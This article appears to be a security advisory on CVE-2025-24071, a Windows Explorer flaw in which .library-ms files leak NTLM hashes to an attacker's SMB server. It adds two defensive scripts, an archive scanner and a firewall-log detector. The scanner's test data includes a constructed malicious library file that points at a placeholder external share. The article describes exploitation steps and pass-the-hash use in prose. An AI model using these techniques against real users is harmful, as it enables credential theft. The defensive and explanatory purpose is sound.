Critical Windows File Explorer Zero-Day Allows Silent NTLM Hash Theft via Archive Extraction


A significant security flaw has been uncovered in Microsoft Windows File Explorer, identified as CVE-2025-24071, which allows malicious actors to surreptitiously obtain NTLM hashed passwords. This critical vulnerability can be exploited through network spoofing by simply tricking a user into extracting a specially crafted compressed file. The ease of exploitation, requiring no further user interaction beyond the standard process of extracting an archive, poses a considerable risk to both individual users and organizations. Security researchers have validated this threat by releasing a proof-of-concept exploit, further underscoring the urgency of addressing this issue. Fortunately, Microsoft has issued a patch for CVE-2025-24071 as part of its March 2025 security updates, urging all affected users to apply the fix immediately [1].

The vulnerability hinges on the way Windows File Explorer handles .library-ms files, which are XML-based files designed to help users organize and search for files by defining search and library locations [1]. Windows Explorer inherently trusts these files to accurately specify library locations, a design aspect that malicious actors are now exploiting [3]. When a user extracts the contents of a compressed archive, such as a RAR or ZIP file, Windows Explorer automatically attempts to process all the files within, including any .library-ms files, to display them correctly and index their metadata [1]. This automatic processing occurs in the background, without requiring the user to explicitly open the .library-ms file itself.

Attackers can craft a malicious .library-ms file containing a <simpleLocation> tag that, instead of pointing to a legitimate local or network library, directs the system to an attacker-controlled Server Message Block (SMB) server [2]. SMB is the standard protocol used by Windows for file sharing and network communication. Upon extraction of the archive containing this malicious file, Windows Explorer and the SearchProtocolHost.exe service, which is part of the Windows indexing service, automatically parse the contents of the .library-ms file. This action triggers an NTLM authentication handshake from the victim’s computer to the attacker’s SMB server [1]. Notably, this entire process unfolds without any user interaction beyond the initial extraction of the compressed archive. The consequence of this silent handshake is the leakage of the victim’s NTLMv2 hash, a cryptographic representation of their password, to the attacker [1]. Once captured, this hash can be used for various malicious purposes. Security researchers have observed that immediately after extraction, the Explorer.exe and SearchProtocolHost.exe processes perform a sequence of operations on the .library-ms file: opening the file (CreateFile), reading its contents (ReadFile), extracting metadata (QueryBasicInformationFile), and closing the file (CloseFile), confirming the automatic nature of the exploitation [2]. The vulnerability arises from the implicit trust placed in .library-ms files and the automatic processing of their content by Windows Explorer, allowing attackers to leverage standard Windows functionality for nefarious ends. Furthermore, the involvement of the SearchProtocolHost.exe service suggests that even if a user does not actively browse the extracted files, the indexing service could still initiate the vulnerable authentication process [2].
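Because the trigger is a .library-ms file whose <simpleLocation> points at a remote host, a defender can screen inbound archives for exactly that pattern before they reach a user's Explorer window. The script below is an added example, not code from the article or from the PoC it describes. It assumes the documented Windows Library Description layout (a <url> element nested under <simpleLocation>, in the http://schemas.microsoft.com/windows/2009/library namespace, matched here with or without the namespace), a hypothetical allowlist of approved file servers, and a constructed sample ZIP built inline with one benign and one suspicious library file; the 203.0.113.10 address is a documentation-range placeholder.

```python
import io
import ipaddress
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlparse

# Hypothetical allowlist: file servers a library definition is expected to reference.
ALLOWED_HOSTS = frozenset({"fileserver01", "fileserver01.corp.example"})

PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def _local_name(tag):
    """Strip an XML namespace prefix ({ns}name -> name) so matching works with or without it."""
    return tag.rsplit("}", 1)[-1]


def extract_locations(xml_bytes):
    """Return the text of every <url> nested under a <simpleLocation> element."""
    root = ET.fromstring(xml_bytes)
    urls = []
    for elem in root.iter():
        if _local_name(elem.tag) != "simpleLocation":
            continue
        for child in elem.iter():
            if _local_name(child.tag) == "url" and child.text and child.text.strip():
                urls.append(child.text.strip())
    return urls


def remote_host(location):
    """Return the host a location refers to (UNC path or URL), or None for a local path."""
    loc = location.strip()
    if loc.startswith("\\\\"):                       # UNC form: \\host\share\...
        return loc[2:].split("\\", 1)[0].lower() or None
    parsed = urlparse(loc)
    if parsed.scheme.lower() in ("smb", "file", "http", "https") and parsed.hostname:
        return parsed.hostname.lower()
    return None                                       # drive-letter paths land here


def classify_host(host):
    """Label a host as a public IP, a private IP, or a name (DNS/NetBIOS)."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "name"
    return "private-ip" if any(ip in net for net in PRIVATE_NETS) else "public-ip"


def scan_archive(zip_bytes, allowed_hosts=ALLOWED_HOSTS):
    """Scan a ZIP's .library-ms members and report remote locations not on the allowlist."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".library-ms"):
                continue
            try:
                urls = extract_locations(zf.read(name))
            except ET.ParseError:
                # A library file that is not even well-formed XML deserves a look too.
                findings.append({"member": name, "url": None, "host": None, "kind": "unparseable"})
                continue
            for url in urls:
                host = remote_host(url)
                if host and host not in allowed_hosts:
                    findings.append({"member": name, "url": url, "host": host,
                                     "kind": classify_host(host)})
    return findings


def build_sample_archive():
    """Constructed test data: one library pointing at a local folder, one pointing off-network."""
    template = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
        '<searchConnectorDescriptionList><searchConnectorDescription>'
        '<simpleLocation><url>{url}</url></simpleLocation>'
        '</searchConnectorDescription></searchConnectorDescriptionList>'
        '</libraryDescription>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "constructed sample, not a real document")
        zf.writestr("Documents.library-ms", template.format(url="C:\\Users\\Public\\Documents"))
        zf.writestr("Invoices.library-ms", template.format(url="\\\\203.0.113.10\\share"))
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_archive(build_sample_archive()):
        print(f"{f['member']}: {f['kind']} location {f['url']!r} (host {f['host']})")
```

Run against the constructed archive it reports only Invoices.library-ms, whose UNC location resolves to a public address; the local-path library is ignored. Any remote host that is not on the allowlist is flagged, since an internal but unexpected host would still cause Explorer to send an authentication handshake. The same checks apply to library files found loose in mail attachments or download folders, not only inside archives.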

A proof-of-concept (PoC) exploit for CVE-2025-24071 was developed and publicly released by the security researcher known as “0x6rss” on GitHub on March 16, 2025 [1]. This public disclosure makes the technical details and a working example of the exploit readily available for scrutiny and, unfortunately, potential misuse. The PoC includes a Python script designed to generate the malicious .library-ms file required to trigger the vulnerability [2]. The script is designed to be easily used, requiring minimal input from an attacker, such as the desired name for the target compressed file and the IP address of the attacker’s SMB server [1]. For instance, running the script (python poc.py) simply prompts for a file name (“Enter file name:”) and an IP address (“Enter IP:”) and then creates the necessary malicious file [1]. The release of this PoC significantly lowers the barrier to entry, allowing individuals with even limited technical skills to potentially exploit this vulnerability. The script automates the intricate process of crafting the malicious .library-ms file, making it a scalable tool for potential attackers [1].

Disturbingly, there are reports indicating that CVE-2025-24071 was being actively exploited in the wild even before its public disclosure on March 11, 2025 [1]. This pre-patch exploitation suggests that malicious actors were already aware of and leveraging this vulnerability for their own purposes. The threat actor known as “Krypt0n” has been specifically linked to the exploitation of this flaw [1]. Krypt0n is reportedly the developer of a malware strain called “EncryptHub Stealer” and is alleged to have offered the exploit for sale on underground cybercrime forums [1]. A translated forum post attributed to this actor details the process: the attacker explains how a server to receive the stolen NTLM hashes can be set up locally, for example, on a Virtual Private Server (VPS). Then, using the exploit, a configuration file is generated with the attacker’s IP address and share details. The attacker claims that if a user simply opens Windows Explorer or accesses a shared folder containing the malicious compressed file, an automatic redirect occurs, and the user’s NTLM hash is sent to the attacker’s server [2]. This early exploitation underscores the high value and active use of this vulnerability by malicious actors, emphasizing the critical need for immediate patching.

The theft of NTLMv2 hashes, as enabled by CVE-2025-24071, can have profound and damaging consequences for affected systems and networks [1]. One of the primary risks associated with stolen NTLM hashes is the ability to conduct pass-the-hash (PtH) attacks [1]. PtH is a technique where attackers use the captured NTLM hash to authenticate to other systems on the network without ever needing the plaintext password [1]. This allows attackers to move laterally throughout the network, gaining access to additional resources and potentially compromising critical systems [1]. If the compromised user account possesses administrative privileges, a PtH attack can lead to privilege escalation, granting the attacker near-complete control over the affected systems and potentially the entire network [4]. Beyond immediate network access, stolen NTLMv2 hashes also present the risk of offline cracking [1]. While NTLMv2 is a more robust protocol than its predecessor, given enough time and computational resources, attackers can attempt to crack the hash to reveal the original plaintext password, which can then be used for even broader access. Furthermore, successful NTLM hash theft can be directly leveraged for network spoofing attacks [1]. By authenticating as a legitimate user using the stolen hash, attackers can perform actions on the network that appear to originate from that user, potentially facilitating further malicious activities or concealing their own. The underlying issue is that the NTLM authentication protocol, while still widely used, has known weaknesses and lacks modern security features such as multi-factor authentication (MFA) [4], making systems that rely on it more susceptible to these types of attacks. The ease with which NTLM hashes can be obtained through CVE-2025-24071 significantly elevates the risk of these severe consequences.

In response to the discovery and active exploitation of CVE-2025-24071, Microsoft released a security update on March 11, 2025, as part of its regular Patch Tuesday release [1]. This update specifically addresses the vulnerability in Windows File Explorer [1]. Microsoft is strongly advising all Windows users to apply these security updates immediately to mitigate the risk of exploitation [1]. The affected Windows versions include a broad range of both client and server operating systems: Windows 10 (all versions from 1507 to 22H2), Windows 11 (versions 22H2, 23H2, and 24H2), and Windows Server (including versions 2012 R2, 2016, 2019, 2022, and 2025) [1]. This particular Patch Tuesday update addressed a total of 57 security flaws across various Microsoft products, including six other vulnerabilities that were reportedly being actively exploited as zero-day attacks [23]. While CVE-2025-24071 was also reportedly exploited in the wild [1], it is categorized by some sources as a publicly disclosed zero-day vulnerability [23], highlighting the urgency for users to apply the patch without delay. The effectiveness of Microsoft’s response hinges on the speed and diligence with which organizations and individual users implement these critical updates. Given the public availability of a working exploit and the reports of active exploitation, delaying the application of this patch significantly increases the window of opportunity for malicious actors.

To effectively protect against the threat posed by CVE-2025-24071, users and organizations should adopt a multi-layered approach to security [1]. The most immediate and critical step is to apply the Microsoft security update released on March 11, 2025, to all affected Windows systems [1]. The update can be found on the Microsoft advisory page: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24071 [3]. Where feasible, organizations should disable NTLM authentication and transition to more secure protocols like Kerberos [2]. While NTLM remains for backward compatibility, its inherent security weaknesses make it a persistent target for attackers [4]. Implementing network segmentation can also limit the potential damage of a successful attack by isolating critical systems [25]. Enabling SMB signing is another recommended measure to help prevent NTLM relay attacks [2]. Adhering to the principle of least privilege, ensuring users only have the necessary permissions, can also reduce the impact of compromised credentials [15]. It is crucial to conduct user awareness training to educate individuals about the risks of extracting files from untrusted sources, even if they do not intend to open or execute them [10]. Organizations should also monitor network traffic for any unusual SMB activity and NTLM authentication attempts [14], and consider implementing file integrity monitoring (FIM) to track changes in sensitive directories [28].
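The monitoring recommendation above is concrete enough to turn into a detection: a workstation that opens an SMB connection (TCP 445 or 139) to an address outside the organization's private ranges is behaving exactly as a victim of this flaw would, whether or not the egress filter let the connection through. The script below is an added example, not code from the article; it assumes a simple key=value firewall log format and uses constructed sample lines with documentation-range addresses (203.0.113.0/24, 198.51.100.0/24) standing in for attacker infrastructure. It also generalizes slightly beyond the article by counting hits per source host so a noisy workstation stands out.

```python
import ipaddress
import re
from collections import Counter

SMB_PORTS = {139, 445}
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Assumed log format: "<timestamp> src=<ip> dst=<ip> dport=<port> proto=<proto> action=<allow|deny>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)"
    r"\s+proto=(?P<proto>\w+)\s+action=(?P<action>\w+)"
)

# Constructed sample lines: two internal SMB sessions (benign), two SMB attempts to
# external hosts (one allowed, one denied), one external HTTPS session, one junk line.
SAMPLE_LOG = """\
2025-03-17T09:14:02Z src=192.168.1.25 dst=192.168.1.5 dport=445 proto=tcp action=allow
2025-03-17T09:14:10Z src=192.168.1.25 dst=203.0.113.10 dport=445 proto=tcp action=allow
2025-03-17T09:14:11Z src=192.168.1.25 dst=203.0.113.10 dport=443 proto=tcp action=allow
2025-03-17T09:15:40Z src=192.168.1.31 dst=198.51.100.7 dport=139 proto=tcp action=deny
2025-03-17T09:16:00Z src=10.0.0.8 dst=10.0.0.9 dport=445 proto=tcp action=allow
this line is malformed and is skipped by the parser
"""


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def is_external(ip_str):
    """True for a routable address outside the private ranges; False for private or unparseable."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False
    return not any(ip in net for net in PRIVATE_NETS)


def find_external_smb(log_text):
    """Return every record where an SMB port was contacted on an external address.

    Denied connections are kept on purpose: the attempt itself shows that something on
    the source host tried to authenticate outward, which is the signal worth triaging.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["dport"] in SMB_PORTS and is_external(rec["dst"]):
            findings.append(rec)
    return findings


def sources_by_count(findings):
    """Count findings per source host so repeat offenders sort to the top."""
    return Counter(f["src"] for f in findings)


if __name__ == "__main__":
    hits = find_external_smb(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['src']} -> {h['dst']}:{h['dport']} ({h['action']})")
    print("per-source:", dict(sources_by_count(hits)))
```

On the sample data two lines are reported, one from each workstation, while the internal file-server traffic and the external HTTPS session pass. In practice the same logic belongs in the SIEM as a scheduled query, paired with an egress rule that blocks TCP 445 and 139 to the internet outright, so that a triggered library file produces a denied log entry rather than a completed handshake.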

The discovery of CVE-2025-24071 is not an isolated incident; it joins a growing list of recently identified NTLM-related vulnerabilities [2]. Similar NTLM-related issues have previously been found in other Microsoft applications, such as Access and Publisher [2]. Notably, a zero-day NTLM vulnerability disclosed in December 2024 also involved the simple act of viewing a malicious file in Windows Explorer [4]. Additionally, the Windows Themes vulnerability (CVE-2024-21320) demonstrated another avenue through which NTLM credentials could be leaked [4]. Even well-known NTLM flaws like PetitPotam and PrinterBug remain unresolved in certain versions of Windows [4]. This consistent emergence of NTLM vulnerabilities underscores the inherent security risks associated with this legacy authentication protocol and highlights the pressing need for organizations to prioritize its replacement with more modern and secure alternatives.

In conclusion, CVE-2025-24071 represents a critical vulnerability in Windows File Explorer that allows for the silent theft of NTLM hashes through a simple archive extraction process. Given the active exploitation of this flaw and the availability of a public proof-of-concept, it is imperative that all affected Windows users and organizations apply Microsoft’s March 2025 security patch immediately. Failure to do so could lead to severe consequences, including network compromise and further malicious activities. Implementing the recommended mitigation strategies alongside patching is essential to strengthen overall security posture and reduce the risk of falling victim to this and similar threats.

Affected Windows versions, as listed in the Microsoft advisory:

Operating System    Affected Versions (Inclusive)
Windows 10          1507 – 22H2
Windows 11          22H2, 23H2, 24H2
Windows Server      2012 R2 – 2025
